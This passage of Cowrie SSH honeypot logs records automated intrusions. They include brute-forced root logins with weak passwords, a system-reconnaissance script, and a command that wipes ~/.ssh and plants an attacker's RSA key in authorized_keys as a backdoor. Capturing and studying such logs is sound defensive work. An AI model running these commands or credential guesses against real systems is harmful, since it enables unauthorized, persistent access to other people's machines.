\"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.734377Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.735175Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.736250Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.737622Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.738654Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.739630Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.740794Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.741714Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.742906Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.743577Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.744530Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.745116Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.921552Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.922512Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.923773Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32988,"dst_ip":"1.2.3.4","dst_port":22,"session":"d76c87644394","protocol":"ssh","message":"New connection: 212.227.235.229:32988 (1.2.3.4:22) [session: d76c87644394]","sensor":"my-vps","timestamp":"2025-08-28T11:15:35.861517Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":41772,"dst_ip":"1.2.3.4","dst_port":22,"session":"370f5dafcdff","protocol":"ssh","message":"New connection: 27.112.79.123:41772 (1.2.3.4:22) [session: 370f5dafcdff]","sensor":"my-vps","timestamp":"2025-08-28T11:15:36.605095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:15:36.606052Z","src_ip":"27.112.79.123","session":"370f5dafcdff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:15:36.870278Z","src_ip":"27.112.79.123","session":"370f5dafcdff"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@888","message":"login attempt [root/Admin@888] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:15:37.955335Z","src_ip":"27.112.79.123","session":"370f5dafcdff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:15:38.951301Z","src_ip":"27.112.79.123","session":"370f5dafcdff"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:15:38.951998Z","src_ip":"27.112.79.123","session":"370f5dafcdff"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:15:38.952853Z","src_ip":"27.112.79.123","session":"370f5dafcdff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:15:39.223022Z","src_ip":"27.112.79.123","session":"370f5dafcdff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:15:39.766432Z","src_ip":"27.112.79.123","session":"370f5dafcdff"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:15:39.767168Z","src_ip":"27.112.79.123","session":"370f5dafcdff"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:15:40.031564Z","src_ip":"27.112.79.123","session":"370f5dafcdff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:15:40.032456Z","src_ip":"27.112.79.123","session":"370f5dafcdff"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":41788,"dst_ip":"1.2.3.4","dst_port":22,"session":"19107be5730e","protocol":"ssh","message":"New connection: 27.112.79.123:41788 (1.2.3.4:22) [session: 19107be5730e]","sensor":"my-vps","timestamp":"2025-08-28T11:15:40.293800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:15:40.294594Z","src_ip":"27.112.79.123","session":"19107be5730e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:15:40.558753Z","src_ip":"27.112.79.123","session":"19107be5730e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:15:41.653394Z","src_ip":"27.112.79.123","session":"19107be5730e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:15:42.586810Z","src_ip":"212.227.235.229","session":"d76c87644394"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:15:42.587862Z","src_ip":"212.227.235.229","session":"d76c87644394"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:15:42.589968Z","src_ip":"212.227.235.229","session":"d76c87644394"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:15:42.918282Z","src_ip":"27.112.79.123","session":"19107be5730e"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":41802,"dst_ip":"1.2.3.4","dst_port":22,"session":"061d032e0a4d","protocol":"ssh","message":"New connection: 27.112.79.123:41802 (1.2.3.4:22) [session: 061d032e0a4d]","sensor":"my-vps","timestamp":"2025-08-28T11:15:43.178970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:15:43.179906Z","src_ip":"27.112.79.123","session":"061d032e0a4d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:15:43.442302Z","src_ip":"27.112.79.123","session":"061d032e0a4d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:15:44.534220Z","src_ip":"27.112.79.123","session":"061d032e0a4d"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:15:44.799516Z","src_ip":"27.112.79.123","session":"370f5dafcdff"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:15:44.800357Z","src_ip":"27.112.79.123","session":"061d032e0a4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46774,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b3ac57d8a52","protocol":"ssh","message":"New connection: 212.227.125.160:46774 (1.2.3.4:22) [session: 2b3ac57d8a52]","sensor":"my-vps","timestamp":"2025-08-28T11:16:06.154873Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:16:06.155551Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:16:06.325992Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.login.success","username":"root","password":"123123","message":"login attempt [root/123123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:16:06.840061Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:16:07.340334Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.341169Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.342223Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.344261Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.345219Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:16:07.345856Z","src_ip":"212.227.125.160","session":"2b3ac57d8a52"}
